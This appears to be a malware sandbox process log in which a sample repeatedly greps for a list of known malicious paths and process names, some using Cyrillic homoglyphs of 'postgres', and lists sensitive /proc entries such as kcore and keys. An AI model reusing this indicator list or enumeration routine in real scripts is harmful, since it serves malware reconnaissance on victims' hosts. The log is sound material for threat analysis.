/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1236
-
-
/bin/grepgrep exe2⤵PID:1240
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1239
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1243
-
-
/bin/grepgrep exe2⤵PID:1247
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1246
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep exe2⤵PID:1253
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1256
-
-
/bin/grepgrep exe2⤵PID:1260
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1259
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1262
-
-
/bin/grepgrep exe2⤵PID:1266
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1265
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1269
-
-
/bin/grepgrep exe2⤵PID:1272
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1271
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1275
-
-
/bin/grepgrep exe2⤵PID:1279
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1278
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1281
-
-
/bin/grepgrep exe2⤵PID:1285
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1284
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1288
-
-
/bin/grepgrep exe2⤵PID:1292
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1291
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1295
-
-
/bin/grepgrep exe2⤵PID:1298
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1297
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1301
-
-
/bin/grepgrep exe2⤵PID:1305
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1304
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1307
-
-
/bin/grepgrep exe2⤵PID:1311
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1310
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1314
-
-
/bin/grepgrep exe2⤵PID:1317
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1321
-
-
/bin/grepgrep exe2⤵PID:1324
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1323
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1327
-
-
/bin/grepgrep exe2⤵PID:1331
-
-
/bin/lsls -latrh /proc/net2⤵PID:1330
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1333
-
-
/bin/grepgrep exe2⤵PID:1337
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1336
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1340
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/grepgrep exe2⤵PID:1348
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1347
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1350
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1355
-
-
/bin/grepgrep exe2⤵PID:1358
-
-
/bin/lsls -latrh /proc/self2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1370
-
-
/bin/grepgrep exe2⤵PID:1373
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1372
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1380
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1382
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/bin/grepgrep exe2⤵PID:1388
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1393
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1392
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1395
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1400
-
-
/bin/grepgrep exe2⤵PID:1403
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1402
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1405
-
-
/bin/grepgrep exe2⤵PID:1408
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1407
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/grepgrep exe2⤵PID:1413
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1412
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1415
-
-
/bin/grepgrep exe2⤵PID:1418
-
-
/bin/lsls -latrh /proc/version2⤵PID:1417
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1422
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1427
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/bin/grepgrep exe2⤵PID:1433
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1432
-
-
